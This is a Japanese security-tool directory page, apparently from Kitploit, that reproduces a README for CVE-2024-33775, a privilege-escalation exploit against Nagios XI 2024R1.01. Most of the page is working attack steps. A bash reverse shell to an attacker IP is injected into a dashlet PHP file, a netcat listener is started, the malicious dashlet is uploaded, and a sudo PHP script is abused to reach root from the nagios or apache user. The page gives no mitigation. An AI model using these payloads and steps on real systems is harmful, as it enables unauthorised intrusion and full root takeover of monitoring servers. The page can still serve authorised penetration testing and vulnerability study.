Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-33775 — Nagios XI 2024R1.01の権限昇格エクスプロイト。悪意のあるRSS dashlet injectionとsudo command executionにより、NAGIOSまたはAPACHEユーザーからフルrootアクセスを可能にする。 | Kitploit
ツール/GitHubGitHub/neo-xed/cve-2024-33775
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubneo-xed/cve-2024-33775

CVE-2024-33775

Nagios XI 2024R1.01の権限昇格エクスプロイト。悪意のあるRSS dashlet injectionとsudo command executionにより、NAGIOSまたはAPACHEユーザーからフルrootアクセスを可能にする。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE Discovered by: K. Wahab (Neo`X)

脆弱性の詳細:

  • 製品: Nagios XI Version 2024R1.01
  • 脆弱性: ユーザー "NAGIOS" または "APACHE" からの権限昇格
  • 結果: 対象システムでの完全なrootアクセス
  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33775

エクスプロイト:

この例ではRSS Dashletが使用されています。

1. Nagios XIの新しいインスタンスを作成する:

  • 以下の場所からNagios XI Version 2024R1.01 OVAファイルをダウンロードできます: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova

2. 権限昇格:

NAGIOSとしてのエクスプロイト:

  • 以下の内容を、"/usr/local/nagiosxi/html/includes/dashlets/"内のdashletの.inc.phpファイルに追加します:

    root@kitploit:~
    exec('/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1);
    
  • 攻撃マシンでNetcatリスニングサーバーを起動します:

    root@kitploit:~
    nc -nlvp 4441
    
  • 以下のコマンドを実行して権限を昇格し、rootとして接続を受け取ります:

    root@kitploit:~
    sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
    

APACHEとしてのエクスプロイト:

  • 「dashlets」管理ページにアクセスし、Dashletをダウンロードします:

    root@kitploit:~
    http://TARGET_IP/nagiosxi/admin/dashlets.php?download=rss_dashlet
    
  • *.inc.phpを変更します:

    root@kitploit:~
    exec("sleep 30 && /bin/bash -c '/bin/bash -i >& /dev/tcp/<Attacker IP>/4441 0>&1'");
    

    Dashlet_inc_php

  • 攻撃マシンでNetcatリスニングサーバーを起動します:

    root@kitploit:~
    nc -nlvp 4441
    
  • 悪意のあるダッシュレットをダッシュレット管理ページにアップロードし、APACHEユーザーとしての接続を待ちます。

  • 以下のコマンドを実行して権限を昇格し、rootとして接続を受け取ります:

    root@kitploit:~
    sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1
    

(注:コマンド実行後、APACHEとして接続を受け取ります。CTRL+Cで終了し、リスナーを複数回再起動してください。)

Apache_root

ツールをダウンロード